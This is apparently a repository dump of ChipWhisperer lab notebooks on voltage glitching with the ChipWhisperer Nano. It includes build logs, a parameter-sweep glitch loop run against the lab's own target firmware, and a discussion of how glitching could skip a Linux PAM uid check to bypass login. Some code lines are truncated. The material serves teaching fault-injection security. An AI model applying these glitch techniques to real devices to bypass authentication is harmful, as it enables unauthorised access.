matplotlib.pylab as plt 368 | fig = plt.figure() 369 | 370 | 371 | **Out [9]:** 372 | 373 | 374 | .. parsed-literal:: 375 | 376 |
377 | 378 | 379 | 380 | **In [10]:** 381 | 382 | .. code:: ipython3 383 | 384 | from importlib import reload 385 | import chipwhisperer.common.results.glitch as glitch 386 | from tqdm.notebook import trange 387 | import struct 388 | 389 | g_step = 1 390 | 391 | gc.set_global_step(g_step) 392 | gc.set_range("repeat", 1, 7) 393 | gc.set_range("ext_offset", 1, 200) 394 | scope.glitch.repeat = 0 395 | 396 | reboot_flush() 397 | sample_size = 1 398 | for glitch_setting in gc.glitch_values(): 399 | scope.glitch.repeat = glitch_setting[0] 400 | scope.glitch.ext_offset = glitch_setting[1] 401 | successes = 0 402 | resets = 0 403 | for i in range(5): 404 | target.flush() 405 | 406 | scope.arm() 407 | 408 | #Do glitch loop 409 | target.write("g\n") 410 | 411 | ret = scope.capture() 412 | 413 | val = target.simpleserial_read_witherrors('r', 4, glitch_timeout=10)#For loop check 414 | 415 | if ret: 416 | print('Timeout - no trigger') 417 | gc.add("reset", (scope.glitch.repeat, scope.glitch.ext_offset)) 418 | plt.plot(scope.glitch.ext_offset, scope.glitch.repeat, 'xr', alpha=1) 419 | fig.canvas.draw() 420 | resets += 1 421 | 422 | #Device is slow to boot? 423 | reboot_flush() 424 | 425 | else: 426 | if val['valid'] is False: 427 | reboot_flush() 428 | gc.add("reset", (scope.glitch.repeat, scope.glitch.ext_offset)) 429 | plt.plot(scope.glitch.ext_offset, scope.glitch.repeat, 'xr', alpha=1) 430 | fig.canvas.draw() 431 | resets += 1 432 | else: 433 | gcnt = struct.unpack(" 0: 444 | print("successes = {}, resets = {}, repeat = {}, ext_offset = {}".format(successes, resets, scope.glitch.repeat, scope.glitch.ext_offset)) 445 | print("Done glitching") 446 | 447 | 448 | **Out [10]:** 449 | 450 | 451 | 452 | .. parsed-literal:: 453 | 454 | 2451 455 | 2451 456 | 2451 457 | 2451 458 | 2451 459 | successes = 5, resets = 0, repeat = 1, ext\_offset = 89 460 | 2451 461 | 2451 462 | 2451 463 | 2451 464 | 2451 465 | successes = 5, resets = 0, repeat = 1, ext\_offset = 90 466 | 2451 467 | 2451 468 | 2451 469 | 2451 470 | 2451 471 | successes = 5, resets = 0, repeat = 1, ext\_offset = 116 472 | 2451 473 | 2451 474 | 2451 475 | 2451 476 | 2451 477 | successes = 5, resets = 0, repeat = 1, ext\_offset = 118 478 | 2498 479 | 2498 480 | 2498 481 | 2498 482 | 2498 483 | successes = 5, resets = 0, repeat = 1, ext\_offset = 170 484 | 2498 485 | 2498 486 | 2498 487 | 2498 488 | 2498 489 | successes = 5, resets = 0, repeat = 1, ext\_offset = 172 490 | 2498 491 | 2498 492 | 2498 493 | 2498 494 | 2498 495 | successes = 5, resets = 0, repeat = 1, ext\_offset = 200 496 | 2451 497 | 2451 498 | 2451 499 | 2451 500 | 2451 501 | successes = 5, resets = 0, repeat = 2, ext\_offset = 77 502 | 2451 503 | 2451 504 | 2451 505 | 2451 506 | 2451 507 | successes = 5, resets = 0, repeat = 2, ext\_offset = 84 508 | 2451 509 | 2451 510 | 2451 511 | 2451 512 | 2451 513 | successes = 5, resets = 0, repeat = 2, ext\_offset = 112 514 | 2498 515 | 2498 516 | 2498 517 | 2498 518 | successes = 4, resets = 0, repeat = 2, ext\_offset = 162 519 | 2498 520 | 2498 521 | 2498 522 | 2498 523 | 2498 524 | successes = 5, resets = 0, repeat = 2, ext\_offset = 166 525 | 2498 526 | 2498 527 | 2498 528 | 2498 529 | 2498 530 | successes = 5, resets = 0, repeat = 2, ext\_offset = 188 531 | 2451 532 | 2451 533 | 2451 534 | 2451 535 | 2451 536 | successes = 5, resets = 0, repeat = 5, ext\_offset = 77 537 | 2451 538 | 2451 539 | 2451 540 | 2451 541 | 2451 542 | successes = 5, resets = 0, repeat = 5, ext\_offset = 84 543 | 2451 544 | 2451 545 | 2451 546 | 2451 547 | 2451 548 | successes = 5, resets = 0, repeat = 5, ext\_offset = 112 549 | 2498 550 | 2498 551 | 2498 552 | 2498 553 | 2498 554 | successes = 5, resets = 0, repeat = 5, ext\_offset = 166 555 | Done glitching 556 | 557 | 558 | 559 | 560 | .. image:: img/CWNANO-CWNANO-courses_fault101_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_14_1.png 561 | 562 | 563 | 564 | **In [11]:** 565 | 566 | .. code:: ipython3 567 | 568 | %matplotlib inline 569 | gc.results.plot_2d(plotdots={"success":"+g", "reset":"xr", "normal":None}) 570 | 571 | 572 | **Out [11]:** 573 | 574 | 575 | .. image:: img/CWNANO-CWNANO-courses_fault101_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_15_0.png 576 | 577 | 578 | 579 | **In [12]:** 580 | 581 | .. code:: ipython3 582 | 583 | scope.dis() 584 | target.dis() 585 | 586 | Unlike the other ChipWhisperers, the Nano doesn’t have sychronous 587 | glitching. This means that ``ext_offset`` is a mixture of both the 588 | offset within the clock cycle, which affects glitch success, and 589 | ext_offset, which affects which instruction is being glitched. As such, 590 | ext_offset settings you find in this lab won’t be directly applicable to 591 | other labs. That being said, good ranges for repeat and the success rate 592 | of glitches still gives valuable information that you can apply to other 593 | labs. 594 | 595 | 596 | **In [ ]:** 597 | 598 | -------------------------------------------------------------------------------- /courses_fault101_SOLN_Fault 2_1B - Introduction to Voltage Glitching with CWNano-CWNANO-CWNANO.rst: -------------------------------------------------------------------------------- 1 | Part 2, Topic 2: Introduction to Voltage Glitching (MAIN) 2 | ========================================================= 3 | 4 | 5 | 6 | **SUMMARY:** *While it’s not as sophisticated as the ChipWhisperer Lite 7 | or ChipWhisperer Pro’s glitch hardware, the ChipWhisperer Nano is also 8 | capable of glitching. In this lab, we’ll do some simple glitch tests on 9 | the Nano’s target board, showing how to scan through glitch settings and 10 | seeing what effect it has on the hardware.* 11 | 12 | **LEARNING OUTCOMES:** 13 | 14 | - Understanding how voltage glitching can be used to disrupt a target’s 15 | operation 16 | - Scanning glitch settings to determine successful ones 17 | 18 | Digital hardware devices have certain voltage and clock requirements to 19 | function properly. If these requirements are not met, the device can 20 | fail to function, or even be damage. By shorting the voltage pins of a 21 | microcontroller for controlled, short periods of time, we can cause it 22 | to behave erratically, clearning registers and skipping instructions. 23 | Such attacks can be immensely powerful in practice. Consider for example 24 | the following code from ``linux-util-2.24``: 25 | 26 | .. code:: c 27 | 28 | /* 29 | * auth.c -- PAM authorization code, common between chsh and chfn 30 | * (c) 2012 by Cody Maloney 31 | * 32 | * this program is free software. you can redistribute it and 33 | * modify it under the terms of the gnu general public license. 34 | * there is no warranty. 35 | * 36 | */ 37 | 38 | #include "auth.h" 39 | #include "pamfail.h" 40 | 41 | int auth_pam(const char *service_name, uid_t uid, const char *username) 42 | { 43 | if (uid != 0) { 44 | pam_handle_t *pamh = NULL; 45 | struct pam_conv conv = { misc_conv, NULL }; 46 | int retcode; 47 | 48 | retcode = pam_start(service_name, username, &conv, &pamh); 49 | if (pam_fail_check(pamh, retcode)) 50 | return FALSE; 51 | 52 | retcode = pam_authenticate(pamh, 0); 53 | if (pam_fail_check(pamh, retcode)) 54 | return FALSE; 55 | 56 | retcode = pam_acct_mgmt(pamh, 0); 57 | if (retcode == PAM_NEW_AUTHTOK_REQD) 58 | retcode = 59 | pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK); 60 | if (pam_fail_check(pamh, retcode)) 61 | return FALSE; 62 | 63 | retcode = pam_setcred(pamh, 0); 64 | if (pam_fail_check(pamh, retcode)) 65 | return FALSE; 66 | 67 | pam_end(pamh, 0); 68 | /* no need to establish a session; this isn't a 69 | * session-oriented activity... */ 70 | } 71 | return TRUE; 72 | } 73 | 74 | This is the login code for the Linux OS. Note that if we could skip the 75 | check of ``if (uid != 0)`` and simply branch to the end, we could avoid 76 | having to enter a password. This is the power of glitch attacks - not 77 | that we are breaking encryption, but simply bypassing the entire 78 | authentication module! 79 | 80 | Glitch Hardware 81 | ~~~~~~~~~~~~~~~ 82 | 83 | The ChipWhisperer Nano’s glitch setup is pretty simple. Like its bigger 84 | brothers, the Lite and the Pro, it uses a MOSFET to short the 85 | microcontroller’s voltage supply to ground: 86 | 87 | |image1| 88 | 89 | For the Nano, ``Glitch In`` is controlled by 2 parameters: 90 | 91 | 1. ``scope.glitch.ext_offset`` - The glitch will be inserted roughly 92 | ``8.3ns * scope.glitch.ext_offset`` 93 | 2. ``scope.glitch.repeat`` - The glitch will be inserted for roughly 94 | ``8.3ns * scope.glitch.repeat`` 95 | 96 | During this lab, we’ll be varying these parameters to see if we can get 97 | the target to mess up a calculation that it’s doing. 98 | 99 | .. |image1| image:: https://wiki.newae.com/images/8/82/Glitch-vccglitcher.png 100 | 101 | 102 | **In [1]:** 103 | 104 | .. code:: ipython3 105 | 106 | SCOPETYPE = 'CWNANO' 107 | PLATFORM = 'CWNANO' 108 | 109 | 110 | **In [2]:** 111 | 112 | .. code:: bash 113 | 114 | %%bash -s "$PLATFORM" 115 | cd ../../../hardware/victims/firmware/simpleserial-glitch 116 | make PLATFORM=$1 CRYPTO_TARGET=NONE 117 | 118 | 119 | **Out [2]:** 120 | 121 | 122 | 123 | .. parsed-literal:: 124 | 125 | SS\_VER set to SS\_VER\_1\_1 126 | rm -f -- simpleserial-glitch-CWNANO.hex 127 | rm -f -- simpleserial-glitch-CWNANO.eep 128 | rm -f -- simpleserial-glitch-CWNANO.cof 129 | rm -f -- simpleserial-glitch-CWNANO.elf 130 | rm -f -- simpleserial-glitch-CWNANO.map 131 | rm -f -- simpleserial-glitch-CWNANO.sym 132 | rm -f -- simpleserial-glitch-CWNANO.lss 133 | rm -f -- objdir/\*.o 134 | rm -f -- objdir/\*.lst 135 | rm -f -- simpleserial-glitch.s simpleserial.s stm32f0\_hal\_nano.s stm32f0\_hal\_lowlevel.s 136 | rm -f -- simpleserial-glitch.d simpleserial.d stm32f0\_hal\_nano.d stm32f0\_hal\_lowlevel.d 137 | rm -f -- simpleserial-glitch.i simpleserial.i stm32f0\_hal\_nano.i stm32f0\_hal\_lowlevel.i 138 | . 139 | Welcome to another exciting ChipWhisperer target build!! 140 | arm-none-eabi-gcc.exe (GNU Arm Embedded Toolchain 9-2020-q2-update) 9.3.1 20200408 (release) 141 | Copyright (C) 2019 Free Software Foundation, Inc. 142 | This is free software; see the source for copying conditions. There is NO 143 | warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 144 | 145 | . 146 | Compiling C: simpleserial-glitch.c 147 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-glitch.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/simpleserial-glitch.o.d simpleserial-glitch.c -o objdir/simpleserial-glitch.o 148 | . 149 | Compiling C: .././simpleserial/simpleserial.c 150 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/simpleserial.o.d .././simpleserial/simpleserial.c -o objdir/simpleserial.o 151 | . 152 | Compiling C: .././hal/stm32f0\_nano/stm32f0\_hal\_nano.c 153 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/stm32f0\_hal\_nano.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/stm32f0\_hal\_nano.o.d .././hal/stm32f0\_nano/stm32f0\_hal\_nano.c -o objdir/stm32f0\_hal\_nano.o 154 | . 155 | Compiling C: .././hal/stm32f0/stm32f0\_hal\_lowlevel.c 156 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/stm32f0\_hal\_lowlevel.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/stm32f0\_hal\_lowlevel.o.d .././hal/stm32f0/stm32f0\_hal\_lowlevel.c -o objdir/stm32f0\_hal\_lowlevel.o 157 | . 158 | Assembling: .././hal/stm32f0/stm32f0\_startup.S 159 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -x assembler-with-cpp -mthumb -mfloat-abi=soft -ffunction-sections -DF\_CPU=7372800 -Wa,-gstabs,-adhlns=objdir/stm32f0\_startup.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ .././hal/stm32f0/stm32f0\_startup.S -o objdir/stm32f0\_startup.o 160 | . 161 | Linking: simpleserial-glitch-CWNANO.elf 162 | arm-none-eabi-gcc -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-glitch.o -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/simpleserial-glitch-CWNANO.elf.d objdir/simpleserial-glitch.o objdir/simpleserial.o objdir/stm32f0\_hal\_nano.o objdir/stm32f0\_hal\_lowlevel.o objdir/stm32f0\_startup.o --output simpleserial-glitch-CWNANO.elf --specs=nano.specs --specs=nosys.specs -T .././hal/stm32f0\_nano/LinkerScript.ld -Wl,--gc-sections -lm -mthumb -mcpu=cortex-m0 -Wl,-Map=simpleserial-glitch-CWNANO.map,--cref -lm 163 | . 164 | Creating load file for Flash: simpleserial-glitch-CWNANO.hex 165 | arm-none-eabi-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature simpleserial-glitch-CWNANO.elf simpleserial-glitch-CWNANO.hex 166 | . 167 | Creating load file for EEPROM: simpleserial-glitch-CWNANO.eep 168 | arm-none-eabi-objcopy -j .eeprom --set-section-flags=.eeprom="alloc,load" \ 169 | --change-section-lma .eeprom=0 --no-change-warnings -O ihex simpleserial-glitch-CWNANO.elf simpleserial-glitch-CWNANO.eep \|\| exit 0 170 | . 171 | Creating Extended Listing: simpleserial-glitch-CWNANO.lss 172 | arm-none-eabi-objdump -h -S -z simpleserial-glitch-CWNANO.elf > simpleserial-glitch-CWNANO.lss 173 | . 174 | Creating Symbol Table: simpleserial-glitch-CWNANO.sym 175 | arm-none-eabi-nm -n simpleserial-glitch-CWNANO.elf > simpleserial-glitch-CWNANO.sym 176 | Size after: 177 | text data bss dec hex filename 178 | 4740 12 1292 6044 179c simpleserial-glitch-CWNANO.elf 179 | +-------------------------------------------------------- 180 | + Default target does full rebuild each time. 181 | + Specify buildtarget == allquick == to avoid full rebuild 182 | +-------------------------------------------------------- 183 | +-------------------------------------------------------- 184 | + Built for platform CWNANO Built-in Target (STM32F030) with: 185 | + CRYPTO\_TARGET = NONE 186 | + CRYPTO\_OPTIONS = 187 | +-------------------------------------------------------- 188 | 189 | 190 | 191 | 192 | **In [3]:** 193 | 194 | .. code:: ipython3 195 | 196 | %run "../../Setup_Scripts/Setup_Generic.ipynb" 197 | 198 | 199 | **Out [3]:** 200 | 201 | 202 | 203 | .. parsed-literal:: 204 | 205 | Serial baud rate = 38400 206 | INFO: Found ChipWhisperer😍 207 | 208 | 209 | 210 | 211 | **In [4]:** 212 | 213 | .. code:: ipython3 214 | 215 | fw_path = "../../../hardware/victims/firmware/simpleserial-glitch/simpleserial-glitch-{}.hex".format(PLATFORM) 216 | cw.program_target(scope, prog, fw_path) 217 | 218 | 219 | **Out [4]:** 220 | 221 | 222 | 223 | .. parsed-literal:: 224 | 225 | Serial baud rate = 115200 226 | Detected known STMF32: STM32F03xx4/03xx6 227 | Extended erase (0x44), this can take ten seconds or more 228 | Attempting to program 4751 bytes at 0x8000000 229 | STM32F Programming flash... 230 | STM32F Reading flash... 231 | Verified flash OK, 4751 bytes 232 | Serial baud rate = 38400 233 | 234 | 235 | 236 | 237 | **In [5]:** 238 | 239 | .. code:: ipython3 240 | 241 | scope.io.clkout = 7.5E6 242 | target.baud = 38400*7.5/7.37 243 | def reboot_flush(): 244 | scope.io.nrst = False 245 | time.sleep(0.05) 246 | scope.io.nrst = "high_z" 247 | time.sleep(0.05) 248 | #Flush garbage too 249 | target.flush() 250 | 251 | 252 | **Out [5]:** 253 | 254 | 255 | 256 | .. parsed-literal:: 257 | 258 | Serial baud rate = 39077.34056987788 259 | 260 | 261 | 262 | 263 | **In [6]:** 264 | 265 | .. code:: ipython3 266 | 267 | scope 268 | 269 | 270 | **Out [6]:** 271 | 272 | 273 | 274 | .. parsed-literal:: 275 | 276 | ChipWhisperer Nano Device 277 | fw_version = 278 | major = 0 279 | minor = 11 280 | debug = 0 281 | io = 282 | tio1 = None 283 | tio2 = None 284 | tio3 = None 285 | tio4 = None 286 | pdid = True 287 | pdic = False 288 | nrst = True 289 | clkout = 7500000.0 290 | adc = 291 | clk_src = int 292 | clk_freq = 7500000.0 293 | samples = 5000 294 | glitch = 295 | repeat = 0 296 | ext_offset = 10 297 | 298 | 299 | 300 | 301 | **In [7]:** 302 | 303 | .. code:: ipython3 304 | 305 | reboot_flush() 306 | scope.arm() 307 | target.write("g\n") 308 | scope.capture() 309 | val = target.simpleserial_read_witherrors('r', 4, glitch_timeout=10)#For loop check 310 | valid = val['valid'] 311 | if valid: 312 | response = val['payload'] 313 | raw_serial = val['full_response'] 314 | error_code = val['rv'] 315 | print(val) 316 | 317 | 318 | **Out [7]:** 319 | 320 | 321 | 322 | .. parsed-literal:: 323 | 324 | {'valid': True, 'payload': CWbytearray(b'c4 09 00 00'), 'full\_response': 'rC4090000\n', 'rv': 0} 325 | 326 | 327 | 328 | 329 | **In [8]:** 330 | 331 | .. code:: ipython3 332 | 333 | import chipwhisperer.common.results.glitch as glitch 334 | gc = glitch.GlitchController(groups=["success", "reset", "normal"], parameters=["repeat", "ext_offset"]) 335 | gc.display_stats() 336 | 337 | 338 | **Out [8]:** 339 | 340 | 341 | 342 | 343 | 344 | 345 | 346 | 347 | 348 | 349 | 350 | Some tips for finding good glitches: 351 | 352 | 1. This is a VCC line that we’re shorting, so there’s going to be stuff 353 | fighting against us. If your glitch is too short, it might not have 354 | any effect 355 | 2. Likewise, if your glitch is too long, the target will always crash. 356 | There’s typically a small band where you’re able to affect the 357 | target, but it won’t always crash it. 358 | 3. Be patient. Glitching can be somewhat inconsistant, so don’t be 359 | discouraged if it takes a while to see some success! 360 | 361 | 362 | **In [9]:** 363 | 364 | .. code:: ipython3 365 | 366 | %matplotlib inline 367 | import matplotlib.pylab as plt 368 | fig = plt.figure() 369 | 370 | 371 | **Out [9]:** 372 | 373 | 374 | .. parsed-literal:: 375 | 376 |
377 | 378 | 379 | 380 | **In [10]:** 381 | 382 | .. code:: ipython3 383 | 384 | from importlib import reload 385 | import chipwhisperer.common.results.glitch as glitch 386 | from tqdm.notebook import trange 387 | import struct 388 | 389 | g_step = 1 390 | 391 | gc.set_global_step(g_step) 392 | gc.set_range("repeat", 1, 7) 393 | gc.set_range("ext_offset", 1, 200) 394 | scope.glitch.repeat = 0 395 | 396 | reboot_flush() 397 | sample_size = 1 398 | for glitch_setting in gc.glitch_values(): 399 | scope.glitch.repeat = glitch_setting[0] 400 | scope.glitch.ext_offset = glitch_setting[1] 401 | successes = 0 402 | resets = 0 403 | for i in range(5): 404 | target.flush() 405 | 406 | scope.arm() 407 | 408 | #Do glitch loop 409 | target.write("g\n") 410 | 411 | ret = scope.capture() 412 | 413 | val = target.simpleserial_read_witherrors('r', 4, glitch_timeout=10)#For loop check 414 | 415 | if ret: 416 | print('Timeout - no trigger') 417 | gc.add("reset", (scope.glitch.repeat, scope.glitch.ext_offset)) 418 | plt.plot(scope.glitch.ext_offset, scope.glitch.repeat, 'xr', alpha=1) 419 | fig.canvas.draw() 420 | resets += 1 421 | 422 | #Device is slow to boot? 423 | reboot_flush() 424 | 425 | else: 426 | if val['valid'] is False: 427 | reboot_flush() 428 | gc.add("reset", (scope.glitch.repeat, scope.glitch.ext_offset)) 429 | plt.plot(scope.glitch.ext_offset, scope.glitch.repeat, 'xr', alpha=1) 430 | fig.canvas.draw() 431 | resets += 1 432 | else: 433 | gcnt = struct.unpack(" 0: 444 | print("successes = {}, resets = {}, repeat = {}, ext_offset = {}".format(successes, resets, scope.glitch.repeat, scope.glitch.ext_offset)) 445 | print("Done glitching") 446 | 447 | 448 | **Out [10]:** 449 | 450 | 451 | 452 | .. parsed-literal:: 453 | 454 | 2451 455 | 2451 456 | 2451 457 | 2451 458 | 2451 459 | successes = 5, resets = 0, repeat = 1, ext\_offset = 121 460 | 2451 461 | successes = 1, resets = 2, repeat = 2, ext\_offset = 9 462 | 2501 463 | 2501 464 | 2501 465 | successes = 3, resets = 0, repeat = 2, ext\_offset = 10 466 | 2451 467 | 2501 468 | 2451 469 | 2497 470 | successes = 4, resets = 0, repeat = 2, ext\_offset = 17 471 | 2501 472 | 2451 473 | 2501 474 | 2501 475 | successes = 4, resets = 0, repeat = 2, ext\_offset = 24 476 | 2501 477 | 2501 478 | 2501 479 | 2501 480 | 2501 481 | successes = 5, resets = 0, repeat = 2, ext\_offset = 25 482 | 2451 483 | successes = 1, resets = 0, repeat = 2, ext\_offset = 28 484 | 2451 485 | 2501 486 | 2501 487 | successes = 3, resets = 1, repeat = 2, ext\_offset = 32 488 | 2451 489 | 2501 490 | 2451 491 | 2501 492 | successes = 4, resets = 1, repeat = 2, ext\_offset = 39 493 | 2501 494 | 2501 495 | 2501 496 | 2501 497 | successes = 4, resets = 0, repeat = 2, ext\_offset = 43 498 | 2501 499 | 2501 500 | 2501 501 | 2501 502 | 2501 503 | successes = 5, resets = 0, repeat = 2, ext\_offset = 50 504 | 2501 505 | 2501 506 | 2501 507 | 2501 508 | 2501 509 | successes = 5, resets = 0, repeat = 2, ext\_offset = 57 510 | 2501 511 | 2501 512 | 2501 513 | 2501 514 | 2501 515 | successes = 5, resets = 0, repeat = 2, ext\_offset = 58 516 | 2451 517 | successes = 1, resets = 3, repeat = 2, ext\_offset = 80 518 | 2451 519 | 2451 520 | successes = 2, resets = 2, repeat = 2, ext\_offset = 87 521 | 2451 522 | successes = 1, resets = 0, repeat = 2, ext\_offset = 90 523 | 2451 524 | 2451 525 | successes = 2, resets = 3, repeat = 2, ext\_offset = 91 526 | 2451 527 | 2451 528 | 2451 529 | 2451 530 | 2451 531 | successes = 5, resets = 0, repeat = 2, ext\_offset = 104 532 | 2499 533 | successes = 1, resets = 0, repeat = 2, ext\_offset = 105 534 | 2499 535 | successes = 1, resets = 0, repeat = 2, ext\_offset = 113 536 | 2451 537 | 2451 538 | 2451 539 | 2451 540 | 2451 541 | successes = 5, resets = 0, repeat = 2, ext\_offset = 115 542 | 1 543 | 1 544 | successes = 2, resets = 0, repeat = 2, ext\_offset = 128 545 | 1 546 | successes = 1, resets = 0, repeat = 2, ext\_offset = 135 547 | 2451 548 | 2501 549 | 2501 550 | 2501 551 | successes = 4, resets = 0, repeat = 2, ext\_offset = 146 552 | 2451 553 | 2501 554 | 2501 555 | 2501 556 | 2501 557 | successes = 5, resets = 0, repeat = 2, ext\_offset = 153 558 | 2501 559 | 2501 560 | 2501 561 | 2501 562 | 2501 563 | successes = 5, resets = 0, repeat = 2, ext\_offset = 154 564 | 2498 565 | 2451 566 | 2498 567 | successes = 3, resets = 2, repeat = 2, ext\_offset = 161 568 | 2451 569 | 2498 570 | successes = 2, resets = 2, repeat = 2, ext\_offset = 168 571 | 2451 572 | 2498 573 | 2451 574 | successes = 3, resets = 2, repeat = 2, ext\_offset = 169 575 | 2498 576 | 2498 577 | 2498 578 | 2498 579 | successes = 4, resets = 0, repeat = 2, ext\_offset = 172 580 | 2499 581 | successes = 1, resets = 2, repeat = 2, ext\_offset = 176 582 | 2499 583 | successes = 1, resets = 2, repeat = 2, ext\_offset = 183 584 | 2498 585 | 2498 586 | 2498 587 | 2498 588 | 2498 589 | successes = 5, resets = 0, repeat = 2, ext\_offset = 185 590 | 2351 591 | 2499 592 | 2351 593 | successes = 3, resets = 1, repeat = 2, ext\_offset = 187 594 | 2498 595 | 2498 596 | 2498 597 | 2498 598 | 2498 599 | successes = 5, resets = 0, repeat = 2, ext\_offset = 194 600 | 2484 601 | successes = 1, resets = 1, repeat = 5, ext\_offset = 9 602 | 2501 603 | 2501 604 | 2501 605 | successes = 3, resets = 0, repeat = 5, ext\_offset = 10 606 | 2501 607 | 2501 608 | 2451 609 | 2501 610 | 2451 611 | successes = 5, resets = 0, repeat = 5, ext\_offset = 17 612 | 2451 613 | 2497 614 | 2451 615 | 2501 616 | 2451 617 | successes = 5, resets = 0, repeat = 5, ext\_offset = 24 618 | 2497 619 | 2451 620 | 2501 621 | 2451 622 | successes = 4, resets = 0, repeat = 5, ext\_offset = 25 623 | 2451 624 | 2451 625 | successes = 2, resets = 0, repeat = 5, ext\_offset = 28 626 | 2451 627 | 2501 628 | 2501 629 | 2451 630 | successes = 4, resets = 1, repeat = 5, ext\_offset = 32 631 | 2451 632 | 2501 633 | 2451 634 | 2501 635 | successes = 4, resets = 1, repeat = 5, ext\_offset = 39 636 | 2501 637 | 2501 638 | 2501 639 | 2501 640 | 2501 641 | successes = 5, resets = 0, repeat = 5, ext\_offset = 43 642 | 2501 643 | 2501 644 | 2501 645 | 2501 646 | 2501 647 | successes = 5, resets = 0, repeat = 5, ext\_offset = 50 648 | 2501 649 | 2501 650 | 2501 651 | 2501 652 | 2501 653 | successes = 5, resets = 0, repeat = 5, ext\_offset = 57 654 | 2501 655 | 2501 656 | 2501 657 | 2501 658 | 2501 659 | successes = 5, resets = 0, repeat = 5, ext\_offset = 58 660 | 2451 661 | 2451 662 | successes = 2, resets = 2, repeat = 5, ext\_offset = 80 663 | 2451 664 | 2451 665 | successes = 2, resets = 2, repeat = 5, ext\_offset = 87 666 | 2451 667 | successes = 1, resets = 1, repeat = 5, ext\_offset = 90 668 | 2451 669 | 2451 670 | 2451 671 | successes = 3, resets = 2, repeat = 5, ext\_offset = 91 672 | 2499 673 | 2499 674 | successes = 2, resets = 0, repeat = 5, ext\_offset = 98 675 | 2451 676 | 2451 677 | 2451 678 | 2451 679 | 2451 680 | successes = 5, resets = 0, repeat = 5, ext\_offset = 104 681 | 2499 682 | successes = 1, resets = 1, repeat = 5, ext\_offset = 113 683 | 2451 684 | 2451 685 | 2451 686 | 2451 687 | 2451 688 | successes = 5, resets = 0, repeat = 5, ext\_offset = 115 689 | 1 690 | 1 691 | successes = 2, resets = 0, repeat = 5, ext\_offset = 128 692 | 2451 693 | 2501 694 | 2501 695 | 2501 696 | successes = 4, resets = 0, repeat = 5, ext\_offset = 146 697 | 2501 698 | 2501 699 | 2501 700 | 2501 701 | 2501 702 | successes = 5, resets = 0, repeat = 5, ext\_offset = 153 703 | 2501 704 | 2501 705 | 2501 706 | 2501 707 | 2501 708 | successes = 5, resets = 0, repeat = 5, ext\_offset = 154 709 | 2498 710 | 2451 711 | successes = 2, resets = 3, repeat = 5, ext\_offset = 161 712 | 2498 713 | 2451 714 | successes = 2, resets = 3, repeat = 5, ext\_offset = 168 715 | 2498 716 | 